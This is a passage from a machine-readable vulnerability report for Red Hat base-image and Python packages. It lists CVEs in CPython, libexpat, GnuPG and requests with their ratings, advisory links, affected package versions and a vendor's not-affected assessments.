          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/482d6f8bdba9da3725d272e8bb4a2d25fb6a603e"
        },
        {
          "url": "https://github.com/python/cpython/commit/69ddd9bb2cc4bd69b1565647c18659c6a789ccd9"
        },
        {
          "url": "https://github.com/python/cpython/commit/876858c9f65d9ab656c7fa639f268ce7856d89dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/a51b1b512de1d56b3714b65628a2eae2b07e535e"
        },
        {
          "url": "https://github.com/python/cpython/commit/c70adad78caeeea33f92f560ecb93331ca11bf66"
        },
        {
          "url": "https://github.com/python/cpython/commit/e58e9802b9bec5cdbf48fc9bf1da5f4fda482e86"
        },
        {
          "url": "https://github.com/python/cpython/issues/145506"
        },
        {
          "url": "https://github.com/python/cpython/pull/145507"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-2297.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2297"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2297"
        }
      ],
      "published": "2026-03-04T23:16:10+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-24515",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24515"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24515"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1131"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24515"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8023-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24515"
        }
      ],
      "published": "2026-01-23T08:16:01+00:00",
      "updated": "2026-06-17T10:23:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-24883",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In GnuPG before 2.5.17, a long signature packet length causes parse_signature to return success with sig->data[] set to a NULL value, leading to a denial of service (application crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24883"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24883"
        },
        {
          "url": "https://dev.gnupg.org/T8049"
        },
        {
          "url": "https://github.com/advisories/GHSA-7246-cvp4-g68w"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24883"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24883"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/01/27/8"
        }
      ],
      "published": "2026-01-27T19:16:16+00:00",
      "updated": "2026-06-17T10:23:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-25645",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        377
      ],
      "description": "Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.",
      "recommendation": "Upgrade requests to version 2.33.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-25645"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-25645"
        },
        {
          "url": "https://github.com/psf/requests"
        },
        {
          "url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"
        },
        {
          "url": "https://github.com/psf/requests/releases/tag/v2.33.0"
        },
        {
          "url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25645"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25645"
        }
      ],
      "published": "2026-03-25T17:16:52+00:00",
      "updated": "2026-06-17T10:25:00+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/requests@2.32.5",
          "versions": [
            {
              "version": "2.32.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/requests@2.32.5"
        },
        {
